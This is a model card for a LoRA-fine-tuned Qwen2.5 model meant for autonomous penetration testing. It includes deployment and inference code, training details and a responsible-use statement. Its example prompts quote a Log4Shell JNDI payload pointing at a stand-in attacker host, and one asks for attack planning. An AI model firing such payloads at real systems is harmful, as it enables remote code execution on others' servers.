---
base_model: Qwen/Qwen2.5-7B-Instruct
library_name: peft
license: apache-2.0
pipeline_tag: text-generation
tags:
- security
- pentesting
- cybersecurity
- lora
- peft
- qwen2.5
- vext
- vulnerability-detection
- red-team
- infosec
- autonomous-agents
datasets:
- custom
language:
- en
widget:
- text: "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${jndi:ldap://attacker.com/a}"
  example_title: Vulnerability Analysis
- text: "nmap -sV scan output:\n22/tcp open ssh OpenSSH 8.2p1\n80/tcp open http Apache httpd 2.4.41\n443/tcp open ssl/http nginx 1.18.0\n3306/tcp open mysql MySQL 5.7.32"
  example_title: Port Scan Analysis
- text: "Given the following reconnaissance data, plan the next attack steps:\nTarget: testapp.example.com\nOpen ports: 80, 443, 8080\nTechnologies: PHP 7.4, MySQL 5.7, Apache 2.4\nDirectories found: /admin, /api/v1, /uploads"
  example_title: Attack Planning
model-index:
- name: vext-pentest-7b
  results:
  - task:
      type: text-generation
      name: Autonomous Penetration Testing
    dataset:
      name: VEXT Security Testing Data
      type: custom
    metrics:
    - name: Validated Findings (True Positives)
      type: custom
      value: 139
    - name: Total Findings Generated
      type: custom
      value: 1977
    - name: Unique Vulnerability Types
      type: custom
      value: 77
    - name: OWASP Categories Covered
      type: custom
      value: 8
    - name: Autonomous Runs
      type: custom
      value: 306
---

# vext-pentest-7b

A security-specialized language model by **VEXT Labs Inc** for autonomous penetration testing and vulnerability assessment.

It is a LoRA adapter for [Qwen/Qwen2.5-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-7B-Instruct), fine-tuned on real-world security testing data covering tool output interpretation, attack planning, vulnerability classification, and remediation guidance.

## What This Model Does

vext-pentest-7b is trained to:

- **Interpret security tool output**: parse and reason about results from nuclei, dalfox, sqlmap, gobuster, naabu, and 20+ other security tools
- **Plan attack strategies**: given a target scope and reconnaissance data, decide which tools to run and in what order
- **Classify vulnerabilities**: separate true positives from false positives in the findings that tools report
- **Generate remediation advice**: provide actionable fix recommendations for discovered vulnerabilities

## Usage

### With vLLM (Recommended for Production)

```bash
# Start vLLM with LoRA support
python -m vllm.entrypoints.openai.api_server \
    --model Qwen/Qwen2.5-7B-Instruct \
    --enable-lora \
    --lora-modules vext-pentest-7b=/path/to/adapter \
    --max-lora-rank 32
```
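
Once the server is running, it exposes an OpenAI-compatible HTTP API, and the adapter is selected by the name given to `--lora-modules`. The following is a minimal sketch of a client, assuming the server listens on vLLM's default `http://localhost:8000`. The helper names `build_chat_request` and `query_server`, the timeout, and the token limit are illustrative choices, not part of the VEXT tooling.

```python
import json
import urllib.request

# Assumption: vLLM's default host and port; adjust to your deployment.
VLLM_URL = "http://localhost:8000/v1/chat/completions"

SYSTEM_PROMPT = (
    "You are a security testing agent. Analyze the following tool output "
    "and identify vulnerabilities."
)


def build_chat_request(tool_output, model="vext-pentest-7b", max_tokens=512):
    """Build a chat-completions payload that targets the LoRA adapter by name."""
    return {
        "model": model,  # must match the name passed to --lora-modules
        "messages": [
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": tool_output},
        ],
        "max_tokens": max_tokens,
    }


def query_server(payload, url=VLLM_URL, timeout=120):
    """POST the payload to the server and return the assistant's reply text."""
    request = urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request, timeout=timeout) as response:
        body = json.load(response)
    return body["choices"][0]["message"]["content"]
```

With the server up, `query_server(build_chat_request(scan_text))` returns the model's analysis of `scan_text` as a string. Requesting `Qwen/Qwen2.5-7B-Instruct` as the `model` instead should route the same prompt to the base model without the adapter, which is useful for side-by-side comparison.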

### With PEFT + Transformers

```python
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

# Load the base model, then attach the LoRA adapter weights on top of it
base = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2.5-7B-Instruct", torch_dtype="auto", device_map="auto")
model = PeftModel.from_pretrained(base, "VextLabs/vext-pentest-7b")
tokenizer = AutoTokenizer.from_pretrained("VextLabs/vext-pentest-7b")

messages = [
    {"role": "system", "content": "You are a security testing agent. Analyze the following tool output and identify vulnerabilities."},
    {"role": "user", "content": "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${jndi:ldap://attacker.com/a}"}
]

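# Render the conversation with the model's chat template and generate a reply
text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(text, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=512)
# Decode only the newly generated tokens, not the echoed prompt
new_tokens = output[0][inputs["input_ids"].shape[1]:]
print(tokenizer.decode(new_tokens, skip_special_tokens=True))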
```

## Training Details

| Parameter | Value |
|-----------|-------|
| Base model | `Qwen/Qwen2.5-7B-Instruct` |
| Method | LoRA (Low-Rank Adaptation) |
| Rank | 32 |
| Alpha | 64 |
| Target modules | `k_proj, v_proj, q_proj, down_proj, o_proj, gate_proj, up_proj` |
| Training steps | 5,000 |
| Training samples | Not reported |
| Final loss | 0.5114 |
| Precision | bfloat16 |
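
To give a sense of the adapter's size, the rank and target modules in the table can be turned into a rough parameter count. This is a back-of-the-envelope sketch, not a figure reported by VEXT Labs: the layer shapes are an assumption taken from the published Qwen2.5-7B-Instruct configuration, and the scaling factor assumes standard LoRA scaling (`alpha / rank`) rather than a rank-stabilized variant.

```python
# Layer shapes are an assumption taken from the published Qwen2.5-7B-Instruct
# config (hidden 3584, MLP 18944, 28 layers, 28 query heads, 4 KV heads).
HIDDEN = 3584
INTERMEDIATE = 18944
NUM_LAYERS = 28
HEAD_DIM = HIDDEN // 28   # 128
KV_DIM = 4 * HEAD_DIM     # 512, because of grouped-query attention

# Values from the training table above
RANK = 32
ALPHA = 64

# (in_features, out_features) for each targeted projection
TARGET_SHAPES = {
    "q_proj": (HIDDEN, HIDDEN),
    "k_proj": (HIDDEN, KV_DIM),
    "v_proj": (HIDDEN, KV_DIM),
    "o_proj": (HIDDEN, HIDDEN),
    "gate_proj": (HIDDEN, INTERMEDIATE),
    "up_proj": (HIDDEN, INTERMEDIATE),
    "down_proj": (INTERMEDIATE, HIDDEN),
}


def lora_params(in_features, out_features, rank=RANK):
    """LoRA adds A (rank x in) and B (out x rank) per adapted weight."""
    return rank * (in_features + out_features)


per_layer = sum(lora_params(i, o) for i, o in TARGET_SHAPES.values())
total = per_layer * NUM_LAYERS
scaling = ALPHA / RANK

print(f"scaling factor (alpha / rank): {scaling}")
print(f"adapter parameters per layer:  {per_layer:,}")
print(f"adapter parameters in total:   {total:,}")
```

Under these assumptions the adapter holds about 80.7 million trainable parameters (2,883,584 per layer across 28 layers), and the low-rank update is scaled by 2.0 before it is added to the frozen base weights.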

### Training Data

Fine-tuned on proprietary security testing data generated by the VEXT platform, including:

- Tool execution traces (input parameters, raw output, parsed results)
- Attack planning decisions (which tool to use, why, expected outcomes)
- Vulnerability validation (true positive vs false positive classification)
- Multi-step attack chains (reconnaissance → enumeration → exploitation)

Data was collected from authorized testing against intentionally vulnerable applications (OWASP Juice Shop, DVWA, bWAPP, WebGoat, and others) and authorized bug bounty targets.
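
The actual record format is proprietary and not documented here. Purely as an illustration of how a tool execution trace with a validation label could be turned into a chat-style fine-tuning example, here is a hypothetical sketch; the `ToolTrace` class, its field names, and the output layout are all assumptions and do not describe the VEXT schema.

```python
import json
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class ToolTrace:
    """Hypothetical record for one tool execution (not the VEXT schema)."""
    tool: str                       # e.g. "nuclei"
    parameters: dict                # input parameters passed to the tool
    raw_output: str                 # unmodified tool output
    parsed_results: list = field(default_factory=list)
    is_true_positive: Optional[bool] = None  # validation label, if known

    def to_chat_example(self, system_prompt):
        """Render the trace as system/user/assistant chat messages."""
        verdicts = {True: "true positive", False: "false positive", None: "unvalidated"}
        user = (
            f"Tool: {self.tool}\n"
            f"Parameters: {json.dumps(self.parameters, sort_keys=True)}\n"
            f"Output:\n{self.raw_output}"
        )
        assistant = (
            f"Verdict: {verdicts[self.is_true_positive]}\n"
            f"Findings: {'; '.join(self.parsed_results) or 'none'}"
        )
        return [
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": user},
            {"role": "assistant", "content": assistant},
        ]


trace = ToolTrace(
    tool="nuclei",
    parameters={"target": "http://localhost:3000"},  # illustrative local lab target
    raw_output="[critical] CVE-2021-44228 Log4Shell detected at /api/login",
    parsed_results=["CVE-2021-44228 at /api/login"],
    is_true_positive=True,
)
messages = trace.to_chat_example("You are a security testing agent.")
```

The resulting `messages` list has the same shape as the one passed to `apply_chat_template` in the usage section, so a record like this could be tokenized with the base model's chat template.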

## Responsible Use

This model is intended for **authorized security testing only**. It should be used:

- Within the scope of authorized penetration testing engagements
- Against applications you own or have explicit permission to test
- In CTF (Capture the Flag) competitions and security training environments
- For defensive security research and vulnerability assessment

**Do not use this model for unauthorized access to computer systems.**

## About VEXT Labs Inc

VEXT Labs is building autonomous security testing agents that combine LLM reasoning with real security tools. Our agents run full penetration tests — from reconnaissance to exploitation to reporting — with human-level decision making.

Learn more at [tryvext.com](https://tryvext.com)

## License

Apache 2.0